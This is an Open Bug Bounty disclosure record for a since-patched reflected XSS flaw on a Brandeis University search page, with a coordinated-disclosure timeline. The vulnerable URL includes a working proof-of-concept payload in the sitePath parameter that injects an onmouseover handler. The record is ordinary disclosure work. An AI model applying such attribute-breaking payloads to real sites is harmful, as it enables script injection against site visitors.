brandeis.edu XSS vulnerability

2017-10-26T15:36:00
ID OBB:369539
Type openbugbounty
Reporter TAHA
Modified 2017-11-25T20:06:00

Description

Vulnerable URL:
http://www.brandeis.edu/search/searchSite_old.php?cx=014453177315759626914%3Ax79taswc0q8&cof;=FORID%3A11&searchURL;=www.brandeis.edu%2Fregistrar&sectionName;=Provost%27s+Office&sectionPath;=http%3A%2F%2Fwww.brandeis.edu%2Fprovost&sitePath;=x%27/onmouseover=prompt(9)/%27&siteLogo;=&displayName;=Office+of+the+University+Registrar&shortName;=Registrar&longName;=Office+of+the+University+Registrar&longName2;=&theme;=admin&hq;=on
Details:

Description| Value
---|---
Patched:| Yes, at 25.11.2017
Latest check for patch:| 25.11.2017 20:06 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 24831
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 26 October, 2017 15:36 GMT
Generic security notifications sent to website owner| 26 October, 2017 15:39 GMT
Notification sent to subscribers (without technical details)| 26 October, 2017 18:17 GMT
Vulnerability details disclosed by researcher| 25 November, 2017 16:37 GMT
Vulnerability patched by the website owner| 25 November, 2017 20:06 GMT